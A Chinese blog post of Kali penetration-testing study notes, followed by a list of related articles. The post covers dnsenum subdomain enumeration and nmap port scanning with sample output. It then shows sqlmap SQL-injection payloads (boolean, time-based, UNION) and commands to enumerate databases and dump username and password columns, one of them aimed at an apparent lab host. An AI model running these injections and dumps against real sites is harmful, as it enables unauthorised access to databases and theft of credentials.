Kali渗透学习(1)——WEB端域名探测与端口扫描于sqlmap注入

最新推荐文章于 2025-04-30 13:24:51 发布
最新推荐文章于 2025-04-30 13:24:51 发布
阅读量1.8k 收藏 3
点赞数
分类专栏: 渗透测试 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43669969/article/details/104390987
版权

Kali渗透学习(1)——WEB端域名探测与端口扫描

前言

学习Kali渗透已经将近半个月了,有必要记录以下自己的学习过程,以免遗忘

1.子域名探测

DNS服务是暴露信息的主要来源,一般安全性高的大型互联网址不容易发现漏洞,所以我们可以从子域名(比如三级域名)下手,而dnsenum是一款强大的域名信息收集工具,使用格式

dnsenum -f (-f指定收集用的字典文件)/usr/share/dnsenum/字典.txt +你要探测的域名或者ip

域名分级
一个完整的域名(.com、.net、.edu、.gov等)由二个或二个以上部分组成,各部分之间用英文的句号".“来分隔,最后一个”."的右边部分称为顶级域名 (Top-level Domain Name),顶级域名“.”的左边部分称为二级域名 (Second-level Domain Name),二级域名的左边部分称为三级域名,以此类推,每一级的域名控制它下一级域名的分配。
比如
.com的com就是顶级域名,其他还有像cn,edu,jp等等
二级域名是顶级域名下的域名,比如 baidu.com的baidu,而baidu.com是一个二级域名网址
如果在baidu.com的左边多加的一个主机名如:bbs.baidu.com,则称bbs.baidu.com为三级域名(重点说明,www.baidu.com 也是一个二级域名)
如果在bbs.baidu.com左边再多加加一个主机名如bai.bbs.baidu.com,则称bai.bbs.baidu.com为四级域名。
以此类推可以得到四级域名,五级域名等,不过一般三级域名以上的应用比较少。

2.端口扫描

当我们收集到子域名后,用nmap进行该域名的端口扫描

nmap -v 域名
常用的扫描参数
-sS TCP SYN扫描
-p 指定端口扫描
-v 显示扫描的过程,也可以使用 -vv
-Pn 当禁止ping后扫描参数
-A 全面的系统扫描

子域名有一些特征需要说明

open是开放端口,filtered是指被过滤的端口,nmap也不知道他是开放的还是关闭的,后面还列出了传输协议
PORT STATE SERVICE REASON
42/tcp filtered nameserver no-response
53/tcp filtered domain host-unreach ttl 54
80/tcp open http syn-ack ttl 53
81/tcp open hosts2-ns syn-ack ttl 54
135/tcp filtered msrpc no-response
139/tcp filtered netbios-ssn no-response
443/tcp open https syn-ack ttl 53
445/tcp filtered microsoft-ds no-response
593/tcp filtered http-rpc-epmap no-response

在域名后加上相关的端口,就可以访问了,或者还可以用namp指定端口扫描

3.尝试sqlmap注入

sqlmap -u(url) “http://尝试注入的urlxxxx.php?id=x”

这里sqlmap会返回是否存在诸如点,比如我这里的是基于布尔型盲注,或者也可以指定注入方式

sqlmap -u(url) “http://尝试注入的urlxxxx.php?id=x” --tech B

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1’ AND 6609=6609 AND ‘gTaI’=‘gTaI
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1’ AND (SELECT 1038 FROM (SELECT(SLEEP(5)))vrpS) AND ‘bDyf’=‘bDyf
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-6063’ UNION ALL SELECT NULL,CONCAT(0x7171706a71,0x48664f574d6643655043716b7841666f414c51547664627461707355646855536e5a6559514e617a,0x717a706271),NULL-- ubNd

查看数据库

sqlmap -u(url) “http://尝试注入的urlxxxx.php?id=x” --dbs

查看某一数据库表单

sqlmap -u(url) “http://尝试注入的urlxxxx.php?id=x” -D 数据库名–tables

某一行字行内容抓取

sqlmap -u “http://xxx.xxx.com/xxxx.php?id=1” -D 数据库名 -T某一行名称 --columns

获得该段的内容

sqlmap -u “http://shop.aqlab.cn:8001/single.php?id=1” -D 数据库名 -T某一行名称 passwd,username(根据自己的扫描结果来写) --dump

Kali [Aquatone]子域名探测工具
weixin_45253622的博客
03-16 3555
子域名探测工具(Aquatone) Aquatone是一款子域名挖掘工具,Aquatone不仅仅只是通过简单的子域爆破,它还会利用各种开放的互联网服务和资源,来协助其完成子域枚举任务,这也大大提高了子域的爆破率。 安装 Aquatone作者建议使用Kali安装使用该工具,并且也只针对Kali使用过程中遇到的问题进行修复,所以这里使用最新版Kali进行安装。使用 aquatone-gather命令需要用到Nightmare.js,所以需要安装npm、electron以及Nightmare。 安装 aquato
[网络安全自学篇] 三十九.hack the box渗透之DirBuster扫描路径及Sqlmap高级注入用法(三)
杨秀璋的专栏
01-15 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来博友们学习,希望您们喜欢,一起进步。前文详细讲解了hack the box在线渗透平台注册过程,以及Web渗透三道入门题目,包括Python编写md5加密发送Post、万能密码和URL路径猜测、BurpSuite和Hydra密码爆破等。这篇文章将通过两个题目分享DirBuster扫描目录、Fuzzy爆破指定路径名称,通过Sqlmap工具实现SQL注入并获取管理员用户名和密码、文件下载等用法。希望您喜欢~
【实战模拟】使用Kali Linux进行域名解析——模拟测试
热门推荐
₰₯₮ 的博客
12-26 8万+
1、ping解析 ping 域名或IP 2、host解析 host www.baidu.com 3、nslookup解析 nslookup www.baidu.com 4、dig解析 dig www.baidu.com 5、dig反向解析 dig -x 110.242.68.42 6、查找域的授权dns服务器 dig baidu.com +nssearch 7、从根服务器追踪一个域名的解析过程 dig baidu.com +...
捡漏黑科技,我靠这个开源域名扫描神器挖出 37 个未注册优质域名
最新发布
easylife206的专栏
04-30 1123
用 Go 语言写的它,功能强大到飞起,堪称域名捡漏界的 “哆啦A梦”!这个工具由大佬用 Go 语言开发,代码开源,托管在 GitHub 上,Star 数还在蹭蹭涨(看看那张 Star History 图,势头猛得像火箭!它不仅能告诉你 “这个域名还能不能注册”,还能像个侦探一样,深入挖掘域名的各种 “秘密”!用它,你可以轻松找到那些还没被注册的宝藏域名,省时省力,简直是创业者、站长和域名爱好者的福音!已注册的域名还会告诉你为啥不行,比如有 DNS 记录或 WHOIS 信息,清晰又贴心!
Kali信息收集~3.子域名系列
weixin_33835690的博客
12-25 531
★3.1Netcraft :子域名查询  官网:http://searchdns.netcraft.com/ 输入要查询的域名,即可得知子域名       3.2Fierce :子域名查询 概述: fierce 是使用多种技术来扫描目标主机IP地址和主机名的一个DNS服务器枚举工具。运用递归的方式来工作。它的工作原理是先通过查询本地DNS服务器来查找目标DNS服务器...
域名扫描器
01-16
能够全面扫描各种组合的域名剩余情况,方便查询!
sqlmap端口扫描神器
05-25
sqlmap端口扫描神器
域名扫描(批量扫描域名的工具)
01-14
域名 扫描办法 以前先容过一个 批量 扫描 域名 的工具,功用算是十分完全的,特别是它为天生 域名 提供的字典导入、模板穷举、关键字组合
渗透测试实验_在kali Linux 2021环境下使用sqlmap对DVWA进行sql注入
weixin_47133613的博客
04-06 8807
文章目录1. sqlmap是什么2. 启动kali Linux ,进行sqlmap更新3. 启动phpStudy,启动火狐浏览器代理,运行BurpSuite4. 如果sqlmap出现404或者返回test的报错,可以尝试重置DVWA,重启phpStudy5. 选择安全等级“Low”,点击“SQL Injection”,通过报文中的url和cookie构造sqlmap命令获取信息5.1 获取数据库5.2 获取dvwa数据库中的表名5.3 获取dvwa库中users表中的列名5.4 获取dvwa库中users表
从实践中学习Kali Linux渗透测试
cc123489ll的博客
06-19 858
1.1.1 黑盒测试黑盒测试(Black-box Testing)也称为外部测试(ExternalTesting)。采用这种方式,测试者将从一个远程网络位置评估目标网络基础设施,并没有任何目标网络内部拓扑等相关信息。完全模拟真实网络环境中的外部攻击者,采用流行技术工具有组织、有步骤的对目标组织进行渗透和入侵,揭示目标网络中一些已知或未知的安全漏洞,并评估这些漏洞能否被利用。优点:有利于挖掘出系统潜在的漏洞,以及脆弱环节和薄弱点。缺点:测试较为费时和费力,同时需要渗透测试者具备较高的技术能力。
[网络安全自学篇] 二十二.Web渗透之网站信息、域名信息、口信息、敏感信息及指纹信息收集
杨秀璋的专栏
10-30 2万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来博友共勉,希望您们喜欢,一起进步。前文分享了Powershell基础入门知识,涉及条件语句、循环语句、数组、函数 、字符串操作、注册表访问等。这篇文章将分享Web渗透的第一步工作,涉及网站信息、域名信息、口信息、敏感信息及指纹信息收集。
域名扫描工具,批量扫描域名注册情况,可导出
06-21
本软件能快速扫描域名注册情况,批量导出导入,速度快,站长朋友不可多得的好工具,如今查找已备案域名比较困难,此工具配合已备案域名查询网】效果极佳。 版本介绍: ======================================================== 2008-7-23 版本 1.2.0 增加最小化到托盘图标的功能,可即时了解查找情况 增加导出格式选择,详细列表和域名字典库2种 修正部分小错误 2008-3-18 版本 1.0.7 由于CN类的whois服务器长期不稳定,在新版本中取消该类域名的查询, 直到服务稳定为止! 望各位用户谅解。 2007-11-20 版本 1.0.6 限制线程总数,最高只能为10线程(因为对于某些服务器造成了负荷) 关闭了搜索情况的提醒 增加了搜索过程的详细信息 更换了部分注册查询服务器 修正.COM等顶级国际域名的搜索 2007-11-12 版本 1.0.3 增加单域名搜索方式 详细各输入栏目的描述 2007-11-8 版本 1.0.1 增强域名选择的弹出窗口 增加代理设置管理界面 修正部分后缀的校验代码 2007-10-11 版本 1.0.0 增加检测搜索状态,如果在开始的1分钟内,搜索量低于10个,将停止并给予解决意见 修正部分界面操作故障 修改域名的检查时间改为无限时,直到1域名检查到确实的注册情况 增加一个显示域名的详细注册情况的网站,在程序中可以引导过去 2007-9-11 版本 0.9.5.0 修复部分失效的域名注册查询网站(解决最近出现的检测时丢失域名的问题) 2007-8-6 版本 0.9.3.0 增加支持HTTP代理服务器模式 增加支持线程数的设置 增加自动检查新版本,并在线升级功能 增加中文字词转换到拼音的功能,由于多音字的问题,建议只作为参考使用 单域名的查询通过输入前缀名称并将随机位数设置为零来实现查询 2007-7-31 版本 0.9.0.0 增加词库模式搜索 增加多后缀搜索,允许对同一个域名进行多个后缀的搜索 2007-7-18 版本 0.8.0.0 修正顺序搜索时的前后缀丢失问题 修正搜索时有重复域名的错误 增加域名列表时的右键快捷功能菜单 缩短停止搜索时的等待时间 增加顺序域名搜索功能 增强搜索过程中的细节显示 2007-7-3 版本 0.7.5.0 优化界面 增加注册向导 增加.cn域名的最新到期名单功能,并能够自动更新 增加相关资讯及网站 增加支持cc,cn,com.cn,net.cn,org.cn,gov.cn,tv这些域名 2007-6-13 版本 0.5.1.3 优化搜索模块,提高搜索速度 2006-09-13 12:00 版本 测试版 0.2.5.0 第一版发布 1.支持英文、数字、英文数字混合域名,随机组合进行检查。 2.支持多种国际顶级域名 3.如果域名已经注册,记录域名的失效日期。 4.提高检查速度。 5.单域名查询
已备案未注册域名批量查询扫描工具 v3.0.zip
07-15
已备案未注册域名批量查询扫描工具主要功能 1.支持批量导入域名进行查询 2.支持批量扫描查询已备案域名 3.支持采集最新已过期的短域名 4.高级的筛选功能,能够识别被K域名 5.支持评估域名外链的质量和域名的价值,加以推荐或特别推荐
【安全测试】sqlmap工具(sql注入)学习
春天的波菜
11-11 1142
sqimap是一个开源的渗透测试工具,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。它有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹、从数据库获取数据到访问底层文件系统和通过带外连接在操作系统上执行命令。官方网址:http://sqlmap.org/本文是用于学习,请自觉维护网络安全。
Subscraper – Kali Linux 中的子域名枚举工具
Galaxy_0的博客
12-20 1280
是 GitHub 上提供的免费开源工具,用于子域侦察。subscraper 用于查找目标网站的子域。该工具用于从网站/网络应用程序中查找子域。通常,安全研究人员很难从 HTTPS 网站或 Web 应用程序中查找子域。该工具有助于获取所有 HTTPS 和 HTTP 网站的子域。subscraper 工具是用 Python 编写的,必须在 Kali Linux 中安装 python 才能使用该工具。该工具具有出色的用户界面。
Kali渗透全方位实战】子域名的概念探测(DNSenum工具和Sublist3r脚本的使用)
李响
03-15 1324
文章目录1 信息收集的重要性2 子域名&DNS解析3 子域名探测的作用4 在线收集子域名的工具5 DNSenum5.1 介绍5.2 使用字典进行子域名爆破测试6 sublist3r.py 1 信息收集的重要性 2 子域名&DNS解析 3 子域名探测的作用 4 在线收集子域名的工具 5 DNSenum 5.1 介绍 也可以直接 DNSenum 【目标】 5.2 使用字典...
自动扫描域名
hunter
07-17 1120
1域名查询 接口采用HTTP,POST,GET协议: 调用URL:http://panda.www.net.cn/cgi-bin/check.cgi 参数名称:area_domain 值为标准域名,例:hichina.com 调用举例:http://panda.www.net.cn/cgi-bin/check.cgi?area_domain=hichina.com 返回XML: HTML代码<?xml version="1.0" encoding="gb2312"?><prope...
完美域名软件,域名扫描,域名抢注!
超越自己就是超越极限
01-06 2616
标 题: 【原创】完美域名软件 作 者: wyw_game 时 间: 2013-01-06 blog :http://blog.youkuaiyun.com/wywGame   这款软件是2010年写的,当时刚好对域名比较感兴趣,就投资注册了许多,现在手头还有库存呢  因为之前在网站上搜索域名很不给力,通常扫描几个就会有验证码之类的东西出现,非常讨厌,在市场上也没找到一款合适的软件,自己动手,丰衣
使用kali上的ffuf进行虚拟主机枚举
-
07-28 352
使用kali上的ffuf进行子域名枚举
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值